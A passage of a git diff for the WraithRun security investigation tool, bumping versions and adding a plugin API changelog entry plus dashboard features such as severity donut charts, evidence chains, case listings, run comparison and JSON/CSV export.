diff --git a/CHANGELOG.md b/CHANGELOG.md
index 20a8393..813890c 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,7 +8,19 @@ The format is inspired by Keep a Changelog and this project follows Semantic Ver
 
 ### Added
 
-- (none yet)
+- **Dashboard UX overhaul** (#99): 5-tab layout (Runs, Findings, Cases, Compare, Health) with SVG donut severity charts, clickable evidence chains, run comparison diff view, JSON/CSV export, real-time progress spinners, and case management panel.
+- **Tool plugin API** (#102): extend WraithRun with external tool plugins via `tool.toml` manifests and subprocess JSON I/O.
+  - `--tools-dir` and `--allowed-plugins` CLI flags.
+  - Automatic plugin discovery, platform filtering, sandbox policy enforcement, and timeout support.
+  - Plugin tools appear in `--doctor` output and `/api/v1/runtime/status` endpoint.
+  - Example plugin in `examples/tools/hello_world/`.
+  - Full documentation in `docs/plugin-api.md`.
+- **Security professional documentation** (#100):
+  - Four investigation playbooks: SSH key compromise, Windows triage, credential leak audit, persistence sweep.
+  - MITRE ATT&CK mapping for all 8 built-in tools.
+  - Threat model with attack surface, trust boundaries, and security controls.
+  - Two anonymized sample investigation reports.
+- Added `io-util` feature to workspace tokio dependency for plugin subprocess I/O.
 
 ### Changed
 
diff --git a/Cargo.lock b/Cargo.lock
index 80a244b..a277d57 100644
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -83,7 +83,7 @@ checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c"
 
 [[package]]
 name = "api_server"
-version = "1.0.0"
+version = "1.1.0"
 dependencies = [
  "anyhow",
  "axum",
@@ -308,7 +308,7 @@ dependencies = [
 
 [[package]]
 name = "core_engine"
-version = "1.0.0"
+version = "1.1.0"
 dependencies = [
  "anyhow",
  "async-trait",
@@ -372,14 +372,16 @@ dependencies = [
 
 [[package]]
 name = "cyber_tools"
-version = "1.0.0"
+version = "1.1.0"
 dependencies = [
  "async-trait",
  "serde",
  "serde_json",
  "sha2",
+ "tempfile",
  "thiserror 1.0.69",
  "tokio",
+ "toml",
  "tracing",
 ]
 
@@ -517,6 +519,12 @@ version = "0.1.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7360491ce676a36bf9bb3c56c1aa791658183a54d2744120f27285738d90465a"
 
+[[package]]
+name = "fastrand"
+version = "2.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a043dc74da1e37d6afe657061213aa6f425f855399a11d3463c6ecccc4dfda1f"
+
 [[package]]
 name = "filetime"
 version = "0.2.27"
@@ -783,7 +791,7 @@ dependencies = [
 
 [[package]]
 name = "inference_bridge"
-version = "1.0.0"
+version = "1.1.0"
 dependencies = [
  "anyhow",
  "async-trait",
@@ -1524,6 +1532,19 @@ dependencies = [
  "xattr",
 ]
 
+[[package]]
+name = "tempfile"
+version = "3.27.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "32497e9a4c7b38532efcdebeef879707aa9f794296a4f0244f6f69e9bc8574bd"
+dependencies = [
+ "fastrand",
+ "getrandom 0.4.2",
+ "once_cell",
+ "rustix",
+ "windows-sys",
+]
+
 [[package]]
 name = "thiserror"
 version = "1.0.69"
@@ -2096,7 +2117,7 @@ dependencies = [
 
 [[package]]
 name = "wraithrun"
-version = "1.0.0"
+version = "1.1.0"
 dependencies = [
  "anyhow",
  "api_server",
diff --git a/Cargo.toml b/Cargo.toml
index 0a9285d..4605618 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -23,7 +23,7 @@ serde_json = "1.0"
 toml = "0.8"
 sha2 = "0.10"
 thiserror = "1.0"
-tokio = { version = "1.44", features = ["macros", "rt-multi-thread", "process", "time", "net"] }
+tokio = { version = "1.44", features = ["macros", "rt-multi-thread", "process", "time", "net", "io-util"] }
 tower-http = { version = "0.6", features = ["cors", "trace", "limit"] }
 tracing = "0.1"
 tracing-subscriber = { version = "0.3", features = ["fmt", "env-filter"] }
diff --git a/api_server/src/dashboard.html b/api_server/src/dashboard.html
index 95eb7b9..4b293c9 100644
--- a/api_server/src/dashboard.html
+++ b/api_server/src/dashboard.html
@@ -63,7 +63,8 @@
 .sev.info { background: #1f2937; color: var(--muted); }
 
 /* Findings */
-.finding { padding: 0.75rem; border-left: 3px solid var(--border); margin-bottom: 0.5rem; }
+.finding { padding: 0.75rem; border-left: 3px solid var(--border); margin-bottom: 0.5rem; cursor: pointer; }
+.finding:hover { background: rgba(88,166,255,0.05); }
 .finding.Critical { border-left-color: var(--red); }
 .finding.High { border-left-color: var(--orange); }
 .finding.Medium { border-left-color: var(--yellow); }
@@ -85,6 +86,9 @@
 .btn:hover { opacity: 0.9; }
 .btn:disabled { opacity: 0.5; cursor: not-allowed; }
 .btn-danger { background: var(--red); }
+.btn-secondary { background: transparent; border: 1px solid var(--border); color: var(--text); }
+.btn-secondary:hover { border-color: var(--accent); }
+.btn-sm { padding: 0.25rem 0.625rem; font-size: 0.75rem; }
 
 /* Detail panel */
 .detail-panel { position: fixed; top: 0; right: -500px; width: 500px; height: 100vh;
@@ -105,6 +109,41 @@
 .token-box h2 { margin-bottom: 1rem; font-size: 1.125rem; }
 .token-box input { width: 100%; padding: 0.5rem 0.75rem; border: 1px solid var(--border); border-radius: 6px;
   background: var(--bg); color: var(--text); font-size: 0.875rem; margin-bottom: 1rem; }
+
+/* Donut chart */
+.donut-container { display: flex; align-items: center; gap: 1rem; margin: 0.75rem 0; }
+.donut-legend { font-size: 0.8125rem; }
+.donut-legend div { display: flex; align-items: center; gap: 0.5rem; margin-bottom: 0.25rem; }
+.donut-legend .swatch { width: 10px; height: 10px; border-radius: 2px; display: inline-block; }
+
+/* Evidence chain */
+.evidence-chain { background: var(--bg); border: 1px solid var(--border); border-radius: 4px; padding: 0.75rem; margin-top: 0.5rem; font-size: 0.8125rem; }
+.evidence-chain .step { padding: 0.25rem 0; border-bottom: 1px solid var(--border); }
+.evidence-chain .step:last-child { border-bottom: none; }
+.evidence-chain .tool-name { color: var(--accent); font-weight: 600; }
+.evidence-chain .turn-num { color: var(--muted); }
+
+/* Compare view */
+.compare-controls { display: flex; gap: 0.5rem; align-items: center; margin-bottom: 1rem; flex-wrap: wrap; }
+.compare-controls select { padding: 0.375rem 0.5rem; border: 1px solid var(--border); border-radius: 6px;
+  background: var(--surface); color: var(--text); font-size: 0.8125rem; }
+.diff-new { border-left: 3px solid var(--green); padding-left: 0.5rem; margin-bottom: 0.5rem; }
+.diff-resolved { border-left: 3px solid var(--muted); padding-left: 0.5rem; margin-bottom: 0.5rem; opacity: 0.7; text-decoration: line-through; }
+.diff-changed { border-left: 3px solid var(--yellow); padding-left: 0.5rem; margin-bottom: 0.5rem; }
+
+/* Export bar */
+.export-bar { display: flex; gap: 0.5rem; margin-bottom: 1rem; flex-wrap: wrap; }
+
+/* Case list */
+.case-row { display: grid; grid-template-columns: 1fr auto auto auto; gap: 1rem; align-items: center; padding: 0.75rem 1rem; border-bottom: 1px solid var(--border); cursor: pointer; }
+.case-row:hover { background: rgba(88,166,255,0.05); }
+.case-row:last-child { border-bottom: none; }
+
+/* Progress indicator */
+.progress-indicator { display: flex; align-items: center; gap: 0.5rem; font-size: 0.8125rem; color: var(--accent); }
+.spinner { width: 14px; height: 14px; border: 2px solid var(--border); border-top-color: var(--accent);
+  border-radius: 50%; animation: spin 0.8s linear infinite; display: inline-block; }
+@keyframes spin { to { transform: rotate(360deg); } }
 </style>
 </head>
 <body>
@@ -131,6 +170,8 @@ <h1>WraithRun</h1>
   <div class="tabs">
     <div class="tab active" data-tab="runs" onclick="switchTab('runs')">Runs</div>
     <div class="tab" data-tab="findings" onclick="switchTab('findings')">Findings</div>
+    <div class="tab" data-tab="cases" onclick="switchTab('cases')">Cases</div>
+    <div class="tab" data-tab="compare" onclick="switchTab('compare')">Compare</div>
     <div class="tab" data-tab="health" onclick="switchTab('health')">Health</div>
   </div>
 
@@ -145,10 +186,30 @@ <h1>WraithRun</h1>
 
   <!-- FINDINGS TAB -->
   <div id="tab-findings" style="display:none">
+    <div class="export-bar">
+      <button class="btn btn-secondary btn-sm" onclick="exportJSON()">Export JSON</button>
+      <button class="btn btn-secondary btn-sm" onclick="exportCSV()">Export CSV</button>
+    </div>
     <div class="filters" id="severity-filters"></div>
     <div id="findings-list"></div>
   </div>
 
+  <!-- CASES TAB -->
+  <div id="tab-cases" style="display:none">
+    <div id="cases-list"></div>
+  </div>
+
+  <!-- COMPARE TAB -->
+  <div id="tab-compare" style="display:none">
+    <div class="compare-controls">
+      <label style="font-size:0.875rem;color:var(--muted)">Run A:</label>
+      <select id="compare-a" onchange="renderCompare()"></select>
+      <label style="font-size:0.875rem;color:var(--muted)">Run B:</label>
+      <select id="compare-b" onchange="renderCompare()"></select>
+    </div>
+    <div id="compare-result"></div>
+  </div>
+
   <!-- HEALTH TAB -->
   <div id="tab-health" style="display:none">
     <div class="health-grid" id="health-grid"></div>
@@ -164,6 +225,8 @@ <h1>WraithRun</h1>
 <script>
 let TOKEN = localStorage.getItem('wraithrun_token') || '';
 let allRuns = [];
+let allRunDetails = {};
+let allCases = [];
 let activeSeverities = new Set(['Critical','High','Medium','Low','Info']);
 let pollTimer = null;
 
@@ -195,7 +258,7 @@ <h1>WraithRun</h1>
     document.getElementById('health-dot').className = 'dot ok';
     document.getElementById('health-text').textContent = 'online';
     document.getElementById('uptime-text').textContent = formatUptime(d.uptime_secs);
-   } catch {
+  } catch {
     document.getElementById('health-dot').className = 'dot down';
     document.getElementById('health-text').textContent = 'offline';
   }
@@ -207,31 +270,104 @@ <h1>WraithRun</h1>
   return Math.floor(secs/3600) + 'h ' + Math.floor((secs%3600)/60) + 'm';
 }
 
+// ---------------------------------------------------------------------------
+// SVG Donut Chart
+// ---------------------------------------------------------------------------
+const SEV_COLORS = { Critical: '#f85149', High: '#db6d28', Medium: '#d29922', Low: '#3fb950', Info: '#8b949e' };
+
+function severityCounts(findings) {
+  const counts = { Critical: 0, High: 0, Medium: 0, Low: 0, Info: 0 };
+  (findings || []).forEach(f => { if (counts.hasOwnProperty(f.severity)) counts[f.severity]++; });
+  return counts;
+}
+
+function renderDonut(counts, size) {
+  size = size || 80;
+  const r = size / 2 - 4;
+  const cx = size / 2, cy = size / 2;
+  const total = Object.values(counts).reduce((a, b) => a + b, 0);
+  if (!total) return '<svg width="' + size + '" height="' + size + '"></svg>';
+  let angle = -90;
+  let paths = '';
+  for (const [sev, count] of Object.entries(counts)) {
+    if (!count) continue;
+    const slice = (count / total) * 360;
+    const startRad = angle * Math.PI / 180;
+    const endRad = (angle + slice) * Math.PI / 180;
+    const x1 = cx + r * Math.cos(startRad), y1 = cy + r * Math.sin(startRad);
+    const x2 = cx + r * Math.cos(endRad), y2 = cy + r * Math.sin(endRad);
+    const large = slice > 180 ? 1 : 0;
+    if (slice >= 359.99) {
+      paths += '<circle cx="' + cx + '" cy="' + cy + '" r="' + r + '" fill="none" stroke="' + SEV_COLORS[sev] + '" stroke-width="8"/>';
+    } else {
+      paths += '<path d="M ' + x1 + ' ' + y1 + ' A ' + r + ' ' + r + ' 0 ' + large + ' 1 ' + x2 + ' ' + y2 + '" fill="none" stroke="' + SEV_COLORS[sev] + '" stroke-width="8"/>';
+    }
+    angle += slice;
+  }
+  return '<svg width="' + size + '" height="' + size + '" viewBox="0 0 ' + size + ' ' + size + '">'
+    + '<circle cx="' + cx + '" cy="' + cy + '" r="' + r + '" fill="none" stroke="var(--border)" stroke-width="8"/>'
+    + paths
+    + '<text x="' + cx + '" y="' + cy + '" text-anchor="middle" dominant-baseline="central" fill="var(--text)" font-size="16" font-weight="700">' + total + '</text>'
+    + '</svg>';
+}
+
+function renderDonutLegend(counts) {
+  let html = '';
+  for (const [sev, count] of Object.entries(counts)) {
+    if (!count) continue;
+    html += '<div><span class="swatch" style="background:' + SEV_COLORS[sev] + '"></span>' + sev + ': ' + count + '</div>';
+  }
+  return html;
+}
+
+// ---------------------------------------------------------------------------
 // Runs
+// ---------------------------------------------------------------------------
 async function loadRuns() {
   try {
     const r = await api('/runs');
     allRuns = await r.json();
+    // Fetch full details for completed runs (for donut charts and comparisons)
+    for (const run of allRuns) {
+      if (run.status === 'completed' && !allRunDetails[run.id]) {
+        try {
+          const dr = await api('/runs/' + run.id);
+          allRunDetails[run.id] = await dr.json();
+        } catch {}
+      }
+    }
     renderRuns();
     renderFindings();
+    populateCompareSelects();
   } catch {}
 }
 
 function renderRuns() {
   const el = document.getElementById('run-list');
   if (!allRuns.length) { el.innerHTML = '<div class="empty">No runs yet. Start an investigation above.</div>'; return; }
-  el.innerHTML = allRuns.map(run => `
-    <div class="card run-row" onclick="showDetail('${run.id}')" style="cursor:pointer">
-      <div>
-        <div class="run-task">${esc(run.task)}</div>
-        <div class="meta">${run.id.slice(0,8)}… · ${run.created_at}</div>
-      </div>
-      <span class="badge ${run.status}">${run.status}</span>
-      <span class="meta">${run.completed_at || ''}</span>
-      ${run.status === 'queued' || run.status === 'running'
-        ? '<button class="btn btn-danger" onclick="event.stopPropagation();cancelRun(\'' + run.id + '\')">Cancel</button>'
-        : ''}
-    </div>`).join('');
+  el.innerHTML = allRuns.map(run => {
+    const detail = allRunDetails[run.id];
+    const isActive = run.status === 'queued' || run.status === 'running';
+    let donutHtml = '';
+    if (detail && detail.report && detail.report.findings && detail.report.findings.length) {
+      const counts = severityCounts(detail.report.findings);
+      donutHtml = '<div class="donut-container">' + renderDonut(counts, 56) + '<div class="donut-legend" style="font-size:0.75rem">' + renderDonutLegend(counts) + '</div></div>';
+    }
+    let progressHtml = '';
+    if (isActive) {
+      progressHtml = '<div class="progress-indicator"><span class="spinner"></span>' + (run.status === 'running' ? 'Running…' : 'Queued') + '</div>';
+    }
+    return '<div class="card run-row" onclick="showDetail(\'' + run.id + '\')" style="cursor:pointer">'
+      + '<div>'
+      + '<div class="run-task">' + esc(run.task) + '</div>'
+      + '<div class="meta">' + run.id.slice(0,8) + '… · ' + run.created_at + '</div>'
+      + donutHtml + progressHtml
+      + '</div>'
+      + '<span class="badge ' + run.status + '">' + run.status + '</span>'
+      + '<span class="meta">' + (run.completed_at || '') + '</span>'
+      + (isActive ? '<button class="btn btn-danger" onclick="event.stopPropagation();cancelRun(\'' + run.id + '\')">Cancel</button>' : '')
+      + '</div>';
+  }).join('');
 }
 
 async function createRun() {
@@ -240,7 +376,7 @@ <h1>WraithRun</h1>
   if (!task) return;
   document.getElementById('run-btn').disabled = true;
   try {
-    await api('/runs', { method: 'POST', body: JSON.stringify({ task }) });
+    await api('/runs', { method: 'POST', body: JSON.stringify({ task: task }) });
     input.value = '';
     await loadRuns();
   } catch(e) { console.error(e); }
@@ -252,66 +388,133 @@ <h1>WraithRun</h1>
   await loadRuns();
 }
 
+// ---------------------------------------------------------------------------
+// Run detail panel with evidence chain
+// ---------------------------------------------------------------------------
 async function showDetail(id) {
   try {
     const r = await api('/runs/' + id);
     const run = await r.json();
+    allRunDetails[id] = run;
     const panel = document.getElementById('detail-panel');
-    let html = `<h2 style="margin-bottom:1rem">${esc(run.task)}</h2>
-      <p><span class="badge ${run.status}">${run.status}</span></p>
-      <p class="meta" style="margin:0.5rem 0">ID: ${run.id}<br>Created: ${run.created_at}${run.completed_at ? '<br>Completed: ' + run.completed_at : ''}</p>`;
-    if (run.error) html += `<div class="card" style="border-color:var(--red);margin-top:1rem"><strong>Error:</strong> ${esc(run.error)}</div>`;
+    let html = '<h2 style="margin-bottom:1rem">' + esc(run.task) + '</h2>'
+      + '<p><span class="badge ' + run.status + '">' + run.status + '</span></p>'
+      + '<p class="meta" style="margin:0.5rem 0">ID: ' + run.id + '<br>Created: ' + run.created_at + (run.completed_at ? '<br>Completed: ' + run.completed_at : '') + '</p>';
+
+    // Export buttons
+    if (run.report) {
+      html += '<div class="export-bar" style="margin-top:0.75rem">'
+        + '<button class="btn btn-secondary btn-sm" onclick="exportRunJSON(\'' + run.id + '\')">Export JSON</button>'
+        + '<button class="btn btn-secondary btn-sm" onclick="exportRunCSV(\'' + run.id + '\')">Export CSV</button>'
+        + '</div>';
+    }
+
+    // Severity donut chart
+    if (run.report && run.report.findings && run.report.findings.length) {
+      const counts = severityCounts(run.report.findings);
+      html += '<div class="donut-container" style="margin-top:0.75rem">' + renderDonut(counts, 100) + '<div class="donut-legend">' + renderDonutLegend(counts) + '</div></div>';
+    }
+
+    if (run.error) html += '<div class="card" style="border-color:var(--red);margin-top:1rem"><strong>Error:</strong> ' + esc(run.error) + '</div>';
+
+    // Findings with evidence chain
     if (run.report && run.report.findings && run.report.findings.length) {
-      html += '<h3 style="margin-top:1rem">Findings</h3>';
-      run.report.findings.forEach(f => {
-        html += `<div class="finding ${f.severity}" style="margin-top:0.5rem">
-          <div style="display:flex;gap:0.5rem;align-items:center">
-            <span class="sev ${(f.severity||'').toLowerCase()}">${f.severity}</span>
-            <strong>${esc(f.title)}</strong>
-          </div>
-          <div class="meta" style="margin-top:0.25rem">Confidence: ${(f.confidence*100).toFixed(0)}%</div>
-          <div style="margin-top:0.25rem;font-size:0.875rem">${esc(f.recommended_action)}</div>
-        </div>`;
+      html += '<h3 style="margin-top:1rem">Findings (' + run.report.findings.length + ')</h3>';
+      run.report.findings.forEach(function(f, idx) {
+        const confLabel = typeof f.confidence === 'number' ? (f.confidence * 100).toFixed(0) + '%' : (f.confidence || '');
+        html += '<div class="finding ' + (f.severity || '') + '" style="margin-top:0.5rem" onclick="event.stopPropagation();toggleEvidence(' + idx + ')">'
+          + '<div style="display:flex;gap:0.5rem;align-items:center">'
+          + '<span class="sev ' + (f.severity || '').toLowerCase() + '">' + (f.severity || '') + '</span>'
+          + '<strong>' + esc(f.title) + '</strong>'
+          + '</div>'
+          + '<div class="meta" style="margin-top:0.25rem">Confidence: ' + confLabel + '</div>'
+          + '<div style="margin-top:0.25rem;font-size:0.875rem">' + esc(f.recommended_action) + '</div>';
+
+        // Evidence chain: tool name, turn, observation excerpt
+        if (f.evidence_refs && f.evidence_refs.length) {
+          html += '<div class="evidence-chain" id="evidence-' + idx + '" style="display:none">';
+          f.evidence_refs.forEach(function(ref) {
+            html += '<div class="step">'
+              + '<span class="tool-name">' + esc(ref.tool || ref.tool_name || 'unknown') + '</span>'
+              + ' <span class="turn-num">(turn ' + (ref.turn != null ? ref.turn : '?') + ')</span>';
+            if (ref.observation_excerpt || ref.excerpt) {
+              html += '<div style="color:var(--muted);margin-top:0.125rem;font-family:monospace;font-size:0.75rem;white-space:pre-wrap;max-height:6rem;overflow-y:auto">'
+                + esc(ref.observation_excerpt || ref.excerpt) + '</div>';
+            }
+            html += '</div>';
+          });
+          html += '</div>';
+        }
+        html += '</div>';
       });
     }
+
+    // Investigation timeline (steps)
+    if (run.report && run.report.steps && run.report.steps.length) {
+      html += '<h3 style="margin-top:1rem">Investigation Timeline</h3>';
+      run.report.steps.forEach(function(step, i) {
+        html += '<div style="padding:0.5rem 0;border-bottom:1px solid var(--border);font-size:0.875rem">'
+          + '<span style="color:var(--accent);font-weight:600">Step ' + (i + 1) + '</span> '
+          + '<span class="tool-name">' + esc(step.tool || '') + '</span>'
+          + (step.duration_ms ? ' <span class="meta">(' + step.duration_ms + 'ms)</span>' : '')
+          + '</div>';
+      });
+    }
+
     if (run.report && run.report.final_answer) {
-      html += `<h3 style="margin-top:1rem">Final Answer</h3><div class="card">${esc(run.report.final_answer)}</div>`;
+      html += '<h3 style="margin-top:1rem">Final Answer</h3><div class="card">' + esc(run.report.final_answer) + '</div>';
     }
+
     document.getElementById('detail-content').innerHTML = html;
     panel.classList.add('open');
   } catch {}
 }
 
+function toggleEvidence(idx) {
+  var el = document.getElementById('evidence-' + idx);
+  if (el) el.style.display = el.style.display === 'none' ? 'block' : 'none';
+}
+
 function closeDetail() { document.getElementById('detail-panel').classList.remove('open'); }
 
-// Findings aggregation
+// ---------------------------------------------------------------------------
+// Findings aggregation with export
+// ---------------------------------------------------------------------------
+function gatherFindings() {
+  const findings = [];
+  allRuns.forEach(function(run) {
+    const detail = allRunDetails[run.id];
+    if (detail && detail.report && detail.report.findings) {
+      detail.report.findings.forEach(function(f) {
+        findings.push(Object.assign({}, f, { run_id: run.id, run_task: run.task }));
+      });
+    }
+  });
+  return findings;
+}
+
 function renderFindings() {
   const container = document.getElementById('findings-list');
   const filterEl = document.getElementById('severity-filters');
   const severities = ['Critical','High','Medium','Low','Info'];
-  filterEl.innerHTML = severities.map(s =>
-    `<button class="filter-btn ${activeSeverities.has(s)?'active':''}" onclick="toggleSeverity('${s}')">${s}</button>`
-  ).join('');
-
-  const findings = [];
-  allRuns.forEach(run => {
-    if (run.report && run.report.findings) {
-      run.report.findings.forEach(f => findings.push({ ...f, run_id: run.id, run_task: run.task }));
-    }
-  });
+  filterEl.innerHTML = severities.map(function(s) {
+    return '<button class="filter-btn ' + (activeSeverities.has(s) ? 'active' : '') + '" onclick="toggleSeverity(\'' + s + '\')">' + s + '</button>';
+  }).join('');
 
-  const filtered = findings.filter(f => activeSeverities.has(f.severity));
+  const findings = gatherFindings();
+  const filtered = findings.filter(function(f) { return activeSeverities.has(f.severity); });
   if (!filtered.length) { container.innerHTML = '<div class="empty">No findings match the current filters.</div>'; return; }
 
-  container.innerHTML = filtered.map(f => `
-    <div class="finding ${f.severity}" style="cursor:pointer" onclick="showDetail('${f.run_id}')">
-      <div style="display:flex;gap:0.5rem;align-items:center">
-        <span class="sev ${(f.severity||'').toLowerCase()}">${f.severity}</span>
-        <strong>${esc(f.title)}</strong>
-      </div>
-      <div class="meta">Confidence: ${(f.confidence*100).toFixed(0)}% · Run: ${f.run_id.slice(0,8)}…</div>
-      <div style="font-size:0.875rem;margin-top:0.25rem">${esc(f.recommended_action)}</div>
-    </div>`).join('');
+  container.innerHTML = filtered.map(function(f) {
+    return '<div class="finding ' + (f.severity || '') + '" onclick="showDetail(\'' + f.run_id + '\')">'
+      + '<div style="display:flex;gap:0.5rem;align-items:center">'
+      + '<span class="sev ' + (f.severity || '').toLowerCase() + '">' + (f.severity || '') + '</span>'
+      + '<strong>' + esc(f.title) + '</strong>'
+      + '</div>'
+      + '<div class="meta">Confidence: ' + (typeof f.confidence === 'number' ? (f.confidence * 100).toFixed(0) + '%' : (f.confidence || '')) + ' · Run: ' + f.run_id.slice(0, 8) + '…</div>'
+      + '<div style="font-size:0.875rem;margin-top:0.25rem">' + esc(f.recommended_action) + '</div>'
+      + '</div>';
+  }).join('');
 }
 
 function toggleSeverity(s) {
@@ -319,7 +522,172 @@ <h1>WraithRun</h1>
   renderFindings();
 }
 
+// ---------------------------------------------------------------------------
+// Export
+// ---------------------------------------------------------------------------
+function downloadBlob(blob, filename) {
+  var url = URL.createObjectURL(blob);
+  var a = document.createElement('a');
+  a.href = url;
+  a.download = filename;
+  document.body.appendChild(a);
+  a.click();
+  document.body.removeChild(a);
+  URL.revokeObjectURL(url);
+}
+
+function exportJSON() {
+  var findings = gatherFindings().filter(function(f) { return activeSeverities.has(f.severity); });
+  var blob = new Blob([JSON.stringify(findings, null, 2)], { type: 'application/json' });
+  downloadBlob(blob, 'wraithrun-findings.json');
+}
+
+function exportCSV() {
+  var findings = gatherFindings().filter(function(f) { return activeSeverities.has(f.severity); });
+  var rows = [['severity', 'title', 'confidence', 'recommended_action', 'run_id']];
+  findings.forEach(function(f) {
+    rows.push([f.severity || '', csvCell(f.title), typeof f.confidence === 'number' ? f.confidence.toString() : '', csvCell(f.recommended_action), f.run_id || '']);
+  });
+  var csv = rows.map(function(r) { return r.join(','); }).join('\n');
+  downloadBlob(new Blob([csv], { type: 'text/csv' }), 'wraithrun-findings.csv');
+}
+
+function exportRunJSON(id) {
+  var detail = allRunDetails[id];
+  if (!detail || !detail.report) return;
+  downloadBlob(new Blob([JSON.stringify(detail.report, null, 2)], { type: 'application/json' }), 'wraithrun-run-' + id.slice(0, 8) + '.json');
+}
+
+function exportRunCSV(id) {
+  var detail = allRunDetails[id];
+  if (!detail || !detail.report || !detail.report.findings) return;
+  var rows = [['severity', 'title', 'confidence', 'recommended_action']];
+  detail.report.findings.forEach(function(f) {
+    rows.push([f.severity || '', csvCell(f.title), typeof f.confidence === 'number' ? f.confidence.toString() : '', csvCell(f.recommended_action)]);
+  });
+  downloadBlob(new Blob([rows.map(function(r) { return r.join(','); }).join('\n')], { type: 'text/csv' }), 'wraithrun-run-' + id.slice(0, 8) + '.csv');
+}
+
+function csvCell(s) { s = s || ''; return s.indexOf(',') >= 0 || s.indexOf('"') >= 0 || s.indexOf('\n') >= 0 ? '"' + s.replace(/"/g, '""') + '"' : s; }
+
+// ---------------------------------------------------------------------------
+// Cases
+// ---------------------------------------------------------------------------
+async function loadCases() {
+  try {
+    const r = await api('/cases');
+    allCases = await r.json();
+    renderCases();
+  } catch {}
+}
+
+function renderCases() {
+  const el = document.getElementById('cases-list');
+  if (!allCases.length) { el.innerHTML = '<div class="empty">No cases yet. Create cases via the API.</div>'; return; }
+  el.innerHTML = allCases.map(function(c) {
+    var sevBadge = c.max_severity ? '<span class="sev ' + c.max_severity.toLowerCase() + '">' + c.max_severity + '</span>' : '';
+    return '<div class="card case-row" onclick="showCaseDetail(\'' + c.id + '\')">'
+      + '<div><div style="font-weight:500">' + esc(c.title) + '</div>'
+      + '<div class="meta">' + c.id.slice(0, 8) + '… · ' + c.created_at + (c.description ? ' · ' + esc(c.description) : '') + '</div></div>'
+      + '<span class="badge ' + c.status + '">' + c.status + '</span>'
+      + sevBadge
+      + '<span class="meta">' + c.run_count + ' run' + (c.run_count !== 1 ? 's' : '') + '</span>'
+      + '</div>';
+  }).join('');
+}
+
+async function showCaseDetail(id) {
+  try {
+    const [caseR, runsR] = await Promise.all([api('/cases/' + id), api('/cases/' + id + '/runs')]);
+    const caseData = await caseR.json();
+    const caseRuns = await runsR.json();
+    const panel = document.getElementById('detail-panel');
+    let html = '<h2 style="margin-bottom:1rem">' + esc(caseData.title) + '</h2>'
+      + '<p><span class="badge ' + caseData.status + '">' + caseData.status + '</span>'
+      + (caseData.max_severity ? ' <span class="sev ' + caseData.max_severity.toLowerCase() + '">' + caseData.max_severity + '</span>' : '') + '</p>'
+      + '<p class="meta" style="margin:0.5rem 0">ID: ' + caseData.id + '<br>Created: ' + caseData.created_at + '<br>Updated: ' + caseData.updated_at + '</p>';
+    if (caseData.description) html += '<p style="margin-top:0.5rem;font-size:0.875rem">' + esc(caseData.description) + '</p>';
+    html += '<h3 style="margin-top:1rem">Runs (' + caseRuns.length + ')</h3>';
+    if (caseRuns.length) {
+      caseRuns.forEach(function(run) {
+        html += '<div class="card" style="cursor:pointer;margin-top:0.5rem" onclick="showDetail(\'' + run.id + '\')">'
+          + '<div style="font-weight:500">' + esc(run.task) + '</div>'
+          + '<div class="meta">' + run.id.slice(0, 8) + '… · <span class="badge ' + run.status + '">' + run.status + '</span></div>'
+          + '</div>';
+      });
+    } else {
+      html += '<div class="empty" style="padding:1rem">No runs linked to this case.</div>';
+    }
+    document.getElementById('detail-content').innerHTML = html;
+    panel.classList.add('open');
+  } catch {}
+}
+
+// ---------------------------------------------------------------------------
+// Run comparison
+// ---------------------------------------------------------------------------
+function populateCompareSelects() {
+  var completed = allRuns.filter(function(r) { return r.status === 'completed'; });
+  ['compare-a', 'compare-b'].forEach(function(selId) {
+    var sel = document.getElementById(selId);
+    var cur = sel.value;
+    sel.innerHTML = '<option value="">— select —</option>' + completed.map(function(r) {
+      return '<option value="' + r.id + '">' + r.id.slice(0, 8) + '… ' + esc(r.task).slice(0, 40) + '</option>';
+    }).join('');
+    if (cur) sel.value = cur;
+  });
+}
+
+function renderCompare() {
+  var container = document.getElementById('compare-result');
+  var idA = document.getElementById('compare-a').value;
+  var idB = document.getElementById('compare-b').value;
+  if (!idA || !idB || idA === idB) { container.innerHTML = '<div class="empty">Select two different completed runs to compare.</div>'; return; }
+  var detA = allRunDetails[idA], detB = allRunDetails[idB];
+  if (!detA || !detB) { container.innerHTML = '<div class="empty">Run details not loaded yet.</div>'; return; }
+
+  var findingsA = (detA.report && detA.report.findings) || [];
+  var findingsB = (detB.report && detB.report.findings) || [];
+  var titlesA = new Set(findingsA.map(function(f) { return f.title; }));
+  var titlesB = new Set(findingsB.map(function(f) { return f.title; }));
+  var sevMapA = {}; findingsA.forEach(function(f) { sevMapA[f.title] = f.severity; });
+  var sevMapB = {}; findingsB.forEach(function(f) { sevMapB[f.title] = f.severity; });
+
+  var newFindings = findingsB.filter(function(f) { return !titlesA.has(f.title); });
+  var resolvedFindings = findingsA.filter(function(f) { return !titlesB.has(f.title); });
+  var changedFindings = findingsB.filter(function(f) { return titlesA.has(f.title) && sevMapA[f.title] !== f.severity; });
+
+  var html = '<div class="card"><h3>Comparison: ' + idA.slice(0, 8) + '… vs ' + idB.slice(0, 8) + '…</h3>'
+    + '<div class="meta" style="margin-bottom:0.75rem">Run A: ' + findingsA.length + ' findings · Run B: ' + findingsB.length + ' findings</div>';
+
+  if (newFindings.length) {
+    html += '<h4 style="color:var(--green);margin:0.5rem 0">New in Run B (' + newFindings.length + ')</h4>';
+    newFindings.forEach(function(f) {
+      html += '<div class="diff-new"><span class="sev ' + (f.severity || '').toLowerCase() + '">' + (f.severity || '') + '</span> ' + esc(f.title) + '</div>';
+    });
+  }
+  if (resolvedFindings.length) {
+    html += '<h4 style="color:var(--muted);margin:0.5rem 0">Resolved from Run A (' + resolvedFindings.length + ')</h4>';
+    resolvedFindings.forEach(function(f) {
+      html += '<div class="diff-resolved"><span class="sev ' + (f.severity || '').toLowerCase() + '">' + (f.severity || '') + '</span> ' + esc(f.title) + '</div>';
+    });
+  }
+  if (changedFindings.length) {
+    html += '<h4 style="color:var(--yellow);margin:0.5rem 0">Changed Severity (' + changedFindings.length + ')</h4>';
+    changedFindings.forEach(function(f) {
